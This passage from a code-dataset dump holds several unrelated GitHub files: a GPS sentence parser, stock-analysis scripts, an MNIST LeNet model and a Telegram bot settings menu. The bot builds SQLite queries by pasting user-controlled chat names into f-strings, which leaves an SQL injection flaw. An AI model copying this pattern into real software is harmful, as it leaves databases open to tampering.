'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n 'opentrackings.apps.opentrackings',\n 'uni_form',\n 'registration',\n 'django_authopenid',\n)\n","repo_name":"tarequeh/opentrackings","sub_path":"src/opentrackings/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"6795127477","text":"import pandas as pd\nimport sys\nimport os\nGPGLL={\n \"Latitude\":[],\n \"N_S Indicator\":[],\n \"Longitude\":[],\n \"E_W Indicator\":[],\n \"UTC time\":[],\n \"Status\":[],\n \"Mode\":[],\n \"Checksum\":[]\n }\nGPRMC={\n \"UTC time\":[],\n \"Status\":[],\n \"Latitude\":[],\n \"N_S Indicator\":[],\n \"Longitude\":[],\n \"E/W Indicator\":[],\n \"Speed over ground\":[],\n \"Course over ground\":[],\n \"Date\":[],\n \"Magnetic variation,degrees\":[],\n \"Magnetic variation,direction\":[],\n \"Mode\":[],\n \"Checksum\":[]\n}\nGPVTG={\n \"Course\":[],\n \"Reference\":[],\n \"Course2\":[],\n \"Reference2\":[],\n \"Speed(knots)\":[],\n \"Unit(knots)\":[],\n \"Speed(kilometers)\":[],\n \"Unit(kilometers)\":[],\n \"Mode\":[],\n \"Checksum\":[]\n}\nGPGGA={\n \"UTC time\":[],\n \"Latitude\":[],\n \"N_S Indicator\":[],\n \"Longitude\":[],\n \"E_W Indicator\":[],\n \"Position Fix Indicator\":[],\n \"Satellites used\":[],\n \"HDOP\":[],\n \"MSL Altitude\":[],\n \"Units(MSL)\":[],\n \"Geoid separation\":[],\n \"Units(Geoid)\":[],\n \"Age of diff. corr\":[],\n \"Diff.ref.station ID\":[],\n \"Checksum\":[]\n}\n \ndef fill_x_list(gps_sentence,listf):\n\n data=open(sys.argv[1],'r')\n count=0\n while True:\n\n line=data.readline()\n line=line.strip()\n\n if (line[:6]==gps_sentence):\n count+=1\n\n line=line.split(',',-1)\n checksum= line[-1].split(\"*\")[1]\n line[-1] =line[-1].split(\"*\")[0]\n line.append(checksum)\n\n for i in range(1,len(line)):\n namekey=tuple(listf.items())[i-1][0]\n listf[namekey].append(line[i])\n\n if not line:\n break\n \n print(\"Quantity of:\",gps_sentence,'sentences',str(count),sep=None)\n data.close()\n return listf\n\nGPVTG=fill_x_list(\"$GPVTG\",GPVTG)\nGPGGA=fill_x_list(\"$GPGGA\",GPGGA)\nGPMRC=fill_x_list(\"$GPRMC\",GPRMC)\nGPGLL=fill_x_list(\"$GPGLL\",GPGLL)\n\nsave_path=sys.argv[2]+'/output/'\n\nif not os.path.exists(save_path):\n os.makedirs(save_path)\n\ndata_csv=pd.DataFrame.from_dict(data=GPGLL,orient='index')\no=data_csv.T\no.to_csv(save_path+'GPGLL.csv')\ndata_csv=pd.DataFrame.from_dict(data=GPVTG,orient='index')\no=data_csv.T\no.to_csv(save_path+'GPVTG.csv')\ndata_csv=pd.DataFrame.from_dict(data=GPMRC,orient='index')\no=data_csv.T\no.to_csv(save_path+'GPMRC.csv')\ndata_csv=pd.DataFrame.from_dict(data=GPGGA,orient='index')\no=data_csv.T\no.to_csv(save_path+'GPGGA.csv')\n","repo_name":"janc18/nmea_text_to_csv_converter","sub_path":"parse_gps_sentences.py","file_name":"parse_gps_sentences.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18925644971","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# - 61 unisort\n# - 60 bisort\n# \n# all covered in the code: tools\n\n# In[1]:\n\n\nfrom tools.crosssection import *\n\n\n# ### read data\n\n# In[2]:\n\n\nfile = 'data_Jan2021/chars60/rank/chars60_rank_imputed.pkl'\ndf = read_pickle_file(file)\n\n# file = 'data_Jan2021/chars60/raw/chars60_raw_imputed.pkl'\n# df_raw = read_pickle_file(file)\n\n\n# In[3]:\n\n\ndf.columns\n\n\n# In[4]:\n\n\nchar_list = ['me',\n 'mom6m', 'acc', 'beta', 'bm_ia',\n 'herf', 'rna', 'cash', 'std_dolvol', 'seas1a',\n 'lgr', 'dolvol', 'nincr', 'turn', 'hire',\n 'mom12m', 'pscore', 'noa', 'rd_sale', 'mom60m',\n 'ato', 'roe', 'rdm', 'sue', 'lev',\n 'mom1m', 'chcsho', 'ni', 'ill', 'chpm',\n 'cfp', 'baspread', 'cashdebt', 'pm', 'abr',\n 'depr', 'rsup', 'bm', 'maxret', 'rvar_capm',\n 'cinvest', 'rvar_mean', 're', 'mom36m',\n 'ep', 'sp', 'gma', 'me_ia', 'zerotrade',\n 'op', 'pctacc', 'chtx', 'rvar_ff3', 'adm',\n 'alm', 'dy', 'std_turn', 'sgr', 'agr',\n 'grltnoa', 'roa']\n# char_list = ['roe','mom12m','beta']\nprint(len(char_list))\nrank_char_list = ['rank_'+i for i in char_list]\n\n# identifiers\nids = ['gvkey','permno','date','ret','lag_me','log_me']\n\n\n# ### delete obs. with NA me\n\n# In[5]:\n\n\ndf1 = df[ids+rank_char_list]\nprint(df1.shape)\ndf1 = df1[~df1['lag_me'].isna()]\nprint(df1.shape)\n\n\n# In[6]:\n\n\nprint(df1.head())\n\n\n# # 20210128\n# - do sorting based on the rank\n# - construct decile portfolios\n# - calculate the ls factors\n\n# In[ ]:\n\n\ncs_vw = cs(df1, char_list, 5, 'lag_me')\ncs_vw.update_all(parallel=True)\n\n\n# In[ ]:\n\n\ncs_ew = cs(df1, char_list, 5, 'ew')\ncs_ew.update_all(parallel=True)\n\n\n# In[ ]:\n\n\nwith open('cs_vw.pkl', 'wb') as f:\n pkl.dump(cs_vw, f)\n\nwith open('cs_ew.pkl', 'wb') as f:\n pkl.dump(cs_ew, f)\n\n","repo_name":"xinhe97/SortCS","sub_path":"main_sort_20210202.py","file_name":"main_sort_20210202.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"72243515121","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport matplotlib.pyplot as plt\n\n# -------------------------\n#\n# SESSION STATES\n#\n# -------------------------\n\nif \"labels\" not in st.session_state:\n st.session_state[\"labels\"] = False\n\n\ndef lbl():\n if st.session_state[\"labels\"]:\n st.session_state[\"labels\"] = False\n else:\n st.session_state[\"labels\"] = True\n\n\n# -------------------------\n#\n# CSS\n#\n# -------------------------\n\nst.markdown(\n \"\"\"\n \n\"\"\",\n unsafe_allow_html=True,\n)\n\n# -------------------------\n#\n# FUNCTIONS\n#\n# -------------------------\n\n# define a function to compute the similarity between the last n days and each n-day window in the dataset\ndef compute_similarity(window):\n last_n_days = df[\"Close\"].iloc[-n_window:]\n similarity_scores = cosine_similarity(\n last_n_days.values.reshape(1, -1), window.values.reshape(1, -1)\n )\n return similarity_scores[0]\n\ndef plot_dataframes(df1, df2):\n # Create the plots\n fig, ax = plt.subplots()\n ax.plot(range(1, 22), df1, label=\"Last 14 days\")\n ax.plot(range(1, 22), df2, label=\"Similar case from the past\")\n\n # Set the chart title and legend\n ax.set_title(\"Stock quotes similarity\")\n ax.legend()\n\n # Display the chart using Streamlit\n st.pyplot(fig)\n\ndef create_null_series(length):\n return pd.Series([None] * length)\n\ndef adjust_dataframe(df_past, df, adjust_index):\n return df_past * (df[\"Close\"].iloc[adjust_index:][0] / df_past[0])\n\n# -------------------------\n#\n# INTRO\n#\n# -------------------------\n\nst.title(\"Yet Another Stock Data Analysis\")\n\n# allow user to upload a CSV file containing stock data\nuploaded_file = st.file_uploader(\n \"Upload stock quotes *.csv\",\n type=[\"csv\"],\n help=\"The file has to have at least a Date column and a Close column. Stock quotes should be sorted from oldest to newest. \",\n)\n\n# allow user to play around with the app without uploading the file\nif st.checkbox(\"Use example file\"):\n uploaded_file = \"gs_us_d.csv\"\n\n# allow user to limit analysis period\nyears = st.slider(\"How many years of data take into account?\", 1, 20, 20)\n\n# welcome note and disclaimers\nwith st.sidebar:\n st.write(\"**Welcome note**\")\n st.write(\n \"Welcome to the stock quote analysis app! The app allows users to easily compare the last 14 days of closing stock quotes to all historical 14 day windows. By doing so, similarity scores are calculated and results are presented in the form of tables and graphs. Additionally, if available, the app presents relevant major events that affected the stock market for the historical period.\"\n )\n st.write(\n \"\"\"To rescale the historical data to current levels, please select the 'Scale results' checkbox.\"\"\"\n )\n st.write(\"**Disclaimer**\")\n st.write(\n \"Please note that the information provided by this app is for educational and informational purposes only. It is not intended to be used as a basis for making investment decisions. The results presented by the app are based on historical data and are not indicative of future performance. Users are advised to conduct their own research and seek the advice of a qualified financial advisor before making any investment decisions. The app's creators and developers are not responsible for any losses or damages that may occur as a result of using this app or relying on the information provided by it.\"\n )\n st.write(\n \"News headlines were generated using Bing Chat and were not independently reviewed.\"\n )\n\n# -------------------------\n#\n# MAIN APP CODE\n#\n# -------------------------\n\nif uploaded_file is not None:\n\n # ----- data load ----\n\n # we will analysis 14-day periods\n n_window = 14\n\n # let's read data stock quotes from the csv\n df = pd.read_csv(uploaded_file)\n\n if \"Data\" in df.columns:\n df.rename(columns={\"Data\": \"Date\"}, inplace=True)\n if \"Zamkniecie\" in df.columns:\n df.rename(columns={\"Zamkniecie\": \"Close\"}, inplace=True)\n if \"Najwyzszy\" in df.columns:\n df.rename(columns={\"Najwyzszy\": \"Max\"}, inplace=True)\n if \"Najnizszy\" in df.columns:\n df.rename(columns={\"Najnizszy\": \"Min\"}, inplace=True)\n if \"Wolumen\" in df.columns:\n df.rename(columns={\"Wolumen\": \"Volume\"}, inplace=True)\n\n df = df.set_index(\"Date\")\n\n # let's read headlines data\n headlines = pd.read_csv(\"headlines.csv\")\n headlines_m = pd.read_csv(\"headlines_m.csv\")\n\n # ----- data manipulation ----\n\n # create a rolling window of 14 days\n df = df[-years * 365 :]\n rolling_window = df[\"Close\"].rolling(window=n_window)\n\n # if i would like to see all rolling windows in the future i can use this part:\n # dfa = [window.to_list() for window in rolling_window]\n # st.write(dfa)\n\n # compute the similarity between the last n days and each n-day window in the dataset\n similarity_scores = rolling_window.apply(compute_similarity, raw=False)\n similarity_scores = similarity_scores.fillna(value=0)\n top_similarities = similarity_scores.argsort()[-10:]\n\n # define a function to make plots\n\n\n # ----- calculationsn ----\n\n i = 1\n df_past_list = []\n df_past_list_last = []\n for index in top_similarities:\n\n # create a series with 7 null values - this will become usefull in a minute\n null_series = create_null_series(7)\n\n # has to be done in order to provide correct window for the tables and plots\n index = index - (n_window - 1)\n\n # create data frame with n last days\n df1 = df[\"Close\"].iloc[-n_window:]\n\n # concatenate the original series and the null series\n df1_plus_nulls = pd.concat([df1, null_series])\n\n # create a data frame for historical window\n df_past = df[\"Close\"].iloc[index : index + 21]\n\n # create a data frame adjusted for first period\n df_past_adj = df_past * (df[\"Close\"].iloc[-14:][0] / df_past[0])\n\n # create a data frame adjusted for first period\n df_past_adj_last = df_past * (df[\"Close\"].iloc[-1:][0] / df_past[13])\n\n # append lists\n df_past_list.append(df_past_adj.values.tolist())\n df_past_list_last.append(df_past_adj_last.values.tolist())\n\n # take into account only periods that large enough to take a peek into the future\n if len(df_past) == 21:\n\n # ----- front end ----\n\n st.markdown(\"---\")\n st.write(\"**Case \" + str(i) + \"**\")\n adjusted = st.checkbox(\"Scale result?\", key=index,value=True)\n\n\n\n\n if adjusted:\n #df_past = df_past * (df[\"Close\"].iloc[-14:][0] / df_past[0])\n df_past = adjust_dataframe(df_past,df,-14)\n col1, col2, col3 = st.columns(3)\n with col1:\n st.write(\"**Last 14 days**\")\n st.write(df1)\n with col2:\n st.write(\"**Similar case from the past**\")\n st.write(df_past)\n with col3:\n # Plot the datasets\n st.write(\"**Plot**\")\n plot_dataframes(df1_plus_nulls, df_past)\n st.write(\"Similarity score\")\n st.write(similarity_scores.iloc[index + 13])\n st.write(\n \"**Major events that affected the stock market in \"\n + str(df.iloc[index].name)[0:7]\n + \"**\"\n )\n if headlines[\"Date\"].eq(df.iloc[index].name).any():\n\n html = str(\n headlines[headlines[\"Date\"] == df.iloc[index].name][\n \"Headlines\"\n ].values[0]\n )\n # st.write(html)\n st.markdown(\n html,\n unsafe_allow_html=True,\n )\n\n else:\n if headlines_m[\"Date\"].eq(df.iloc[index].name[0:7]).any():\n html = str(\n headlines_m[headlines_m[\"Date\"] == df.iloc[index].name[0:7]][\n \"Headlines\"\n ].values[0]\n )\n st.markdown(\n html,\n unsafe_allow_html=True,\n )\n else:\n st.write(\"No data. Chat Bing prompt:\")\n st.write(\n \" *What were the major events that affected the stock market in \"\n + str(df.iloc[index].name[0:7])\n + \"?*\"\n )\n i += 1\n\n st.markdown(\"---\")\n st.write(\"**Results summarized on one chart (scaled to the first period)**\")\n df_past_list = pd.DataFrame(df_past_list)\n # st.write(df_past_list)\n fig, ax = plt.subplots()\n for i in range(0, len(df_past_list)):\n ax.plot(range(1, 22), df_past_list.iloc[i], label=\"Last 14 days\", alpha=0.2)\n ax.plot(\n range(1, 22),\n df1_plus_nulls,\n label=\"Last 14 days\",\n color=\"red\",\n marker=\"o\",\n markersize=3,\n )\n # Set the chart title and legend\n ax.set_title(\"Stock quotes similarity\")\n ax.grid(color=\"grey\", linestyle=\"-\", linewidth=0.1, axis=\"y\")\n\n # Display the chart using Streamlit\n st.pyplot(fig)\n\n if \"projection\" not in st.session_state:\n st.session_state.projection = [None] * 21\n\n st.write(\"**Results summarized on one chart (scaled to the last period)**\")\n\n value = st.slider(\"Select \\% change from last close\", -3.0, 3.0, 0.0)\n col1, col2 = st.columns(2)\n with col1:\n st.code(list(df1_plus_nulls)[13])\n with col2:\n st.code(f\"{(list(df1_plus_nulls)[13] * (1 + value / 100)):.2f}\")\n\n st.session_state.projection[13] = list(df1_plus_nulls)[13]\n st.session_state.projection[14] = list(df1_plus_nulls)[13] * (1 + value / 100)\n\n df_past_list_last = pd.DataFrame(df_past_list_last)\n # st.write(df_past_list)\n fig, ax = plt.subplots()\n for i in range(0, len(df_past_list_last)):\n ax.plot(\n range(1, 22), df_past_list_last.iloc[i], label=\"Last 14 days\", alpha=0.2\n )\n ax.plot(\n range(1, 22),\n df1_plus_nulls,\n label=\"Last 14 days\",\n color=\"red\",\n marker=\"o\",\n markersize=3,\n )\n\n ax.plot(\n range(1, 22),\n st.session_state.projection,\n label=\"Last 14 days\",\n color=\"black\",\n marker=\"o\",\n markersize=3,\n )\n\n if st.session_state[\"labels\"]:\n for i in range(0, 14):\n ax.annotate(\n list(df1_plus_nulls)[i],\n (i, list(df1_plus_nulls)[i]),\n size=8,\n # bbox=dict(boxstyle=\"round4,pad=.5\", fc=\"0.8\"),\n ha=\"center\",\n # va=\"top\",\n )\n # Set the chart title and legend\n ax.set_title(\"Stock quotes similarity\")\n ax.grid(color=\"grey\", linestyle=\"-\", linewidth=0.1, axis=\"y\")\n\n # Display the chart using Streamlit\n st.pyplot(fig)\n\n st.checkbox(\"Show labels\", on_change=lbl)\n\n\n# prompts for chat bot\n# What were the major events that affected the stock market in may 2005? Please present them in html code. Do not add references.\n","repo_name":"TomJohnH/streamlit-stock","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":11403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27981269044","text":"class Solution(object):\n\n def removeInvalidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n global _max\n _max = 0\n \"\"\"\n :Helper function to explore the different strings which can be built\n :result : list[str]\n :current: str\n :lcount: The count of left parenthesis\n :maxcount: The amount of removals performed\n :s: the orignal string\n \"\"\"\n def DFS(result, current, lcount, maxcount, s):\n global _max\n if(len(s) == 0):\n if(lcount == 0 and len(current) != 0):\n if maxcount > _max:\n _max = maxcount\n if _max == maxcount and (current not in result):\n result.append(current)\n return\n else:\n if s[0] == '(':#if its a left parenthesis\n temp = list(current)\n current.append('(')\n DFS(result, current, lcount + 1, maxcount + 1, s[1:])#Either we use it\n current = list(temp)\n DFS(result, current, lcount, maxcount, s[1:])#Or we dont\n elif s[0] == ')':\n if(lcount > 0):#if it is valid to place a right paranthesis\n temp = list(current)\n current.append(')')\n DFS(result, current, lcount - 1, maxcount, s[1:])#Either we use it\n current = list(temp)\n DFS(result, current, lcount, maxcount, s[1:])#Or we dont\n else:#if its any other character\n current.append(s[0])\n DFS(result, current, lcount, maxcount, s[1:])\n\n\n\n result = []\n DFS(result,[],0,0,s)\n if(len(result) == 0):\n result.append([''])\n return [\"\".join(string) for string in result]\n","repo_name":"ArcticFaded/InterviewQuestions","sub_path":"facebook/hard/Remove Invalid Parenthesis/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1423633264","text":"from redbot.core import commands\n\nclass IntroChannelManager(commands.Cog):\n \"\"\"My custom cog\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def introchannelmanager(self, ctx):\n \"\"\"This does stuff!\"\"\"\n # Your code will go here\n await ctx.send(\"I can do stuff!\")","repo_name":"jjodalton/ukfur-cogs","sub_path":"intromanager/introchannelmanager.py","file_name":"introchannelmanager.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32082892272","text":"# 作者 : 杨航\n# 开发时间 : 2022/10/13 14:32\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport cv2\nimport matplotlib.pyplot as plt\n\n(train_images,train_labels),(test_images,test_labels)= tf.keras.datasets.mnist.load_data()\n# 增加维度,便于卷积操作\ntrain_images = train_images.reshape(60000,28,28,1)\ntest_images = test_images.reshape(10000,28,28,1)\n\n# 归一化\ntrain_images = train_images/255\ntest_images = test_images/255\n\n# 标签的独热编码\ntrain_labels = np.array(pd.get_dummies(train_labels))\ntest_labels = np.array(pd.get_dummies(test_labels))\n\n# 搭建网络\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Conv2D(filters=6,kernel_size=(5,5),input_shape=(28,28,1),padding='same',activation='sigmoid'))\nmodel.add(tf.keras.layers.AveragePooling2D(pool_size=(2,2)))\nmodel.add(tf.keras.layers.Conv2D(filters=16,kernel_size=(5,5),activation='sigmoid'))\nmodel.add(tf.keras.layers.AveragePooling2D(pool_size=(2,2)))\nmodel.add(tf.keras.layers.Conv2D(filters=120,kernel_size=(5,5),activation='sigmoid'))\nmodel.add(tf.keras.layers.Flatten())\nmodel.add(tf.keras.layers.Dense(84,activation='sigmoid'))\nmodel.add(tf.keras.layers.Dense(10,activation='softmax'))\nmodel.summary()\n\n# 模型优化(adam优化器,交叉熵损失函数,记录训练的正确率)\nmodel.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['acc'])\n\n# 训练\n# 训练图片、训练标签作为输入。测试图片、测试标签作为每一轮的验证\nhistory = model.fit(train_images,train_labels,epochs=10,validation_data=(test_images,test_labels))\n\n# 模型评估\nmodel.evaluate(test_images,test_labels)\n# 模型保存\nmodel.save('mnist.h5')\n# 调用模型\nnew_model = tf.keras.models.load_model('mnist.h5')\n\n# 调用模型\nnew_model = tf.keras.models.load_model('mnist.h5')\n# 读取图片(灰度图)\nimg = cv2.imread('F:/PythonRepository/Machine-Learing/picture/3.png',0)\n# plt.imshow(img)\nimg = cv2.resize(img,(28,28)) # 将图片变为28*28的像素\nimg = img.reshape(1,28,28,1) # 调整维度\nimg = img/255 # 归一化\npredict = new_model.predict(img)\nprint(predict)\nresult = np.argmax(predict)\nprint(result)","repo_name":"wooyeonicon/DeepLearning","sub_path":"DeepLearning_tensorflow/LeNet_5.py","file_name":"LeNet_5.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1835547655","text":"import random as r\nimport sqlite3\nfrom typing import Union\n\nfrom telegram import (InlineKeyboardMarkup, InlineKeyboardButton, Update)\nfrom telegram.error import BadRequest\nfrom telegram.ext import CallbackContext\n\nfrom constants import samir, harshil, sql_table\nfrom helpers.logger import logger\nfrom helpers.namer import get_nick, get_chat_name\n\nCURRENT_SETTINGS, UPDATED, PROBABILITY = range(3)\n\nmsg = None\n_type = \"\"\nmorn_setting = \"\"\nprofane_prob = 0.2\nmedia_prob = 0.3\n\nsetting_markup = InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Media reactions 🎛️\", callback_data=\"MEDIA_PROB\")],\n [InlineKeyboardButton(text=\"Profanity reactions 🎛️\", callback_data=\"PROFANE_PROB\")],\n [InlineKeyboardButton(text=\"Morning quote 💬\", callback_data=\"Morning\")],\n [InlineKeyboardButton(text=\"Save changes 💾\", callback_data=\"SAVE\")]\n ]\n)\n\nprob_markup = InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"🔙 Back\", callback_data=\"Back\")],\n [InlineKeyboardButton(text=\"🔻10%\", callback_data=str(-0.1)),\n InlineKeyboardButton(text=\"🔻5%\", callback_data=str(-0.05)),\n InlineKeyboardButton(text=\"🔺5%\", callback_data=str(0.05)),\n InlineKeyboardButton(text=\"🔺10%\", callback_data=str(0.1))],\n [InlineKeyboardButton(text=\"⬇0%⬇\", callback_data=str(0.0)),\n InlineKeyboardButton(text=\"⬆100%⬆\", callback_data=str(1.0))]\n ]\n)\n\n\ndef start(update: Update, context: CallbackContext) -> int:\n \"\"\"\n Called when user uses /settings. If it is the first time using it, it creates and uses default bot settings.\n Can only be used in groups where user is admin, or in private chats.\n \"\"\"\n global morn_setting, conn, c\n\n chat_id = update.effective_chat.id\n user_id = update.message.from_user.id\n\n try:\n admins = context.bot.get_chat_administrators(chat_id=chat_id) # Get group admins\n except BadRequest: # When it is a private chat\n pass\n else:\n for admin in admins:\n if user_id in (samir, harshil) or admin.user.id == user_id: # Check if admin/creators are calling /settings\n break\n else:\n responses = (\"I'm not allowing you like you say\", \"Ask the permission then only\",\n \"This is not for you okay?\", \"Only few of them can do this not all okay?\",\n \"See not you so sowry\")\n context.bot.send_message(chat_id=chat_id, text=r.choice(responses),\n reply_to_message_id=update.message.message_id)\n del responses\n return -1 # Stop convo since a regular user called /settings\n\n logger(message=f\"/settings\", command=True, update=update)\n\n conn = sqlite3.connect('./files/bot_settings.db')\n c = conn.cursor()\n name = get_nick(update, context)\n\n c.executescript(sql_table) # If table is not made\n conn.commit()\n\n c.execute(f\"SELECT EXISTS(SELECT * FROM CHAT_SETTINGS WHERE chat_id = {chat_id});\") # Returns 0 if doesn't exist\n result = c.fetchone()\n\n if not result[0]:\n c.execute(f\"INSERT INTO CHAT_SETTINGS VALUES({chat_id},'{name}','❌',0.3,0.2);\") # First time use\n conn.commit()\n\n c.execute(f\"SELECT MORNING_MSGS FROM CHAT_SETTINGS WHERE chat_id = {chat_id};\")\n result = c.fetchone()\n morn_setting = result[0]\n\n # Sends the current settings applied-\n if update.callback_query is None:\n context.bot.send_message(chat_id=chat_id, text=setting_msg(update), reply_markup=setting_markup,\n parse_mode=\"MarkdownV2\")\n\n return UPDATED\n\n\ndef setting_msg(update, swap: bool = False) -> str:\n \"\"\"Helper function to modify or create the /settings menu message.\"\"\"\n\n global msg, media_prob, profane_prob, morn_setting\n chat_id = update.effective_chat.id\n results = []\n\n if swap: # Swaps setting when user clicks button.\n if morn_setting == \"✅\":\n morn_setting = \"❌\"\n else:\n morn_setting = \"✅\"\n\n for col in (\"MEDIA_PROB\", \"PROFANE_PROB\"):\n c.execute(f\"SELECT {col} FROM CHAT_SETTINGS WHERE CHAT_ID={chat_id};\")\n result = c.fetchone()\n results.append(result[0]) # Append probability\n results.append(f\"{int(round(result[0] * 100))}%\") # Append corresponding percent\n\n media_prob, media_pct, profane_prob, profane_pct = results\n\n msg = \"See is this the expected behaviour?\\n\\n\" \\\n r\"1\\. _Media reactions:_ \" + f\"{media_pct}\\n\" \\\n r\"2\\. _Profanity reactions:_ \" + f\"{profane_pct}\\n\" \\\n r\"3\\. _Morning quotes:_ \" + f\"{morn_setting}\\n\"\n return msg\n\n\ndef prob_message(update, kind: str, column: str) -> Union[None, str]:\n \"\"\"Helper function to show current probability of corresponding setting.\"\"\"\n\n chat_id = update.effective_chat.id\n\n if column == \"\":\n return\n\n c.execute(f\"SELECT {column} FROM CHAT_SETTINGS WHERE CHAT_ID={chat_id};\")\n result = c.fetchone()\n chance = f\"{int(round(result[0] * 100))}%\" # Rounding it as there could be floating point round off errors.\n\n prob_msg = f\"See now mathematically speaking, the probability of reacting to {kind} is: {chance}\"\n return prob_msg\n\n\ndef prob_updater(update: Update, context: CallbackContext) -> int: # PROBABILITY\n \"\"\"Updates probability when buttons are pressed. Also instantly saves those values in the database.\"\"\"\n global media_prob, profane_prob\n\n chat_id = update.effective_chat.id\n call_id = update.callback_query.id\n invalid = False\n\n prob_diff = float(update.callback_query.data)\n\n # Assign probability to common variable for simplicity-\n if _type == \"media\":\n _prob = media_prob\n else:\n _prob = profane_prob\n\n new = _prob + prob_diff # Calculate new probability\n\n if prob_diff in (0.0, 1.0): # When user clicks 0% or 100%\n new = prob_diff\n\n elif not 0.0 <= new <= 1.0:\n invalid = True\n\n col = ''\n if not invalid: # Update database only if entry is valid.\n if _type == \"media\":\n media_prob = new # Set updated value back to original variable for next callback query\n col = \"MEDIA_PROB\"\n else:\n profane_prob = new\n col = \"PROFANE_PROB\"\n\n c.execute(f\"UPDATE CHAT_SETTINGS SET {col}={new} WHERE CHAT_ID={chat_id};\")\n conn.commit()\n\n edit_msg = prob_message(update, kind=_type, column=col)\n\n if edit_msg is not None:\n try:\n update.callback_query.edit_message_text(text=edit_msg, reply_markup=prob_markup)\n except BadRequest: # When user clicks 100% or 0% button again and again.\n pass\n context.bot.answer_callback_query(callback_query_id=call_id)\n\n else: # When message is not edited, i.e. when user is stupid\n context.bot.answer_callback_query(callback_query_id=call_id,\n text=\"Are you confused? Probability is between 0% and 100% okay?\",\n show_alert=True)\n\n return PROBABILITY\n\n\ndef change_prob(update: Update, _: CallbackContext) -> int: # UPDATED\n \"\"\"\n This is run when the user clicks button to change the probability. It is common for both profanity and media\n reactions.\n \"\"\"\n\n global _type, media_prob, profane_prob\n\n data = update.callback_query.data\n\n if data == \"MEDIA_PROB\":\n _type = \"media\"\n else:\n _type = \"profanity\"\n\n update.callback_query.edit_message_text(text=prob_message(update, kind=_type, column=data),\n reply_markup=prob_markup)\n\n return PROBABILITY\n\n\ndef morn_swap(update: Update, context: CallbackContext) -> int: # UPDATED\n \"\"\"Used to swap states of morning quotes.\"\"\"\n\n global morn_setting\n\n update.callback_query.edit_message_text(text=setting_msg(update, swap=True), reply_markup=setting_markup,\n parse_mode=\"MarkdownV2\")\n context.bot.answer_callback_query(callback_query_id=update.callback_query.id) # Clears `loading` in clients.\n\n return UPDATED\n\n\ndef go_back(update: Update, _: CallbackContext) -> int: # PROBABILITY\n \"\"\"Goes back to main menu.\"\"\"\n\n update.callback_query.edit_message_text(text=setting_msg(update), reply_markup=setting_markup,\n parse_mode=\"MarkdownV2\")\n\n return UPDATED\n\n\ndef save(update: Update, _: CallbackContext) -> int: # UPDATED\n \"\"\"Called when user clicks save. Saves all applied settings into database.\"\"\"\n\n global morn_setting\n\n chat_id = update.effective_chat.id\n\n responses = (\"I updated my behaviour\", \"See I got the clarity now\", r\"I will now like you do fo\\.\\.follow this\",\n \"Ok I will do this now it's not that hard\", \"I am now in the right direction\")\n\n confirmations = (\"Now I'm like this:\", \"This is okay with me now like:\", \"Okay fine I'm okay with this:\",\n \"I have like you say changed now:\", \"My new behaviour is:\")\n\n # Show settings have been updated-\n update.callback_query.edit_message_text(text=r.choice(responses) + f\"\\n\\n{r.choice(confirmations)}\\n\" + msg[36:],\n parse_mode=\"MarkdownV2\")\n\n logger(message=f\"{update.effective_user.first_name} just updated {get_chat_name(update)}'s settings to:\\n\"\n f\"Media={media_prob}, Profanity={profane_prob}, Morning quotes={morn_setting}.\")\n\n c.execute(f\"UPDATE CHAT_SETTINGS SET MORNING_MSGS='{morn_setting}' WHERE CHAT_ID={chat_id};\")\n conn.commit()\n\n # Checks if group name has changed, if it did, updates in db-\n c.execute(f\"SELECT CHAT_NAME FROM CHAT_SETTINGS WHERE CHAT_ID={chat_id};\") # Gets name from db\n result = c.fetchone()\n name = get_chat_name(update) # Gets name of chat\n\n if name != result[0]: # If the name is not the same, update it in db\n c.execute(f\"UPDATE CHAT_SETTINGS SET CHAT_NAME='{name}' WHERE CHAT_ID={chat_id};\")\n conn.commit()\n\n conn.close() # Close connection, we don't want mem leaks\n del name, chat_id, responses, confirmations, result\n return -1\n","repo_name":"tmslads/Shanispeakbot","sub_path":"convos/settings_gui.py","file_name":"settings_gui.py","file_ext":"py","file_size_in_byte":10124,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"86752215812","text":"from umit.inventory.server.Module import ServerModule\nfrom umit.inventory.server.ServerInterface import ServerInterface\nfrom umit.inventory.server.ServerInterfaceMessages import ResponseFields\nfrom umit.inventory.Configuration import InventoryConfig\n\nimport logging\nimport json\n\n\nclass DeviceSensor(ServerModule):\n\n def __init__(self, configs, shell):\n ServerModule.__init__(self, configs, shell)\n\n self.agent_tracker = None\n self.command_tracker = None\n\n self.device_sensor_host_info = {}\n\n self.request_handlers = {\n 'REAL_TIME_REQUEST' : self.handle_real_time_request,\n 'REAL_TIME_CLOSE' : self.handle_real_time_close,\n 'GET_NOTIFICATION_COND' : self.handle_get_notification_cond,\n 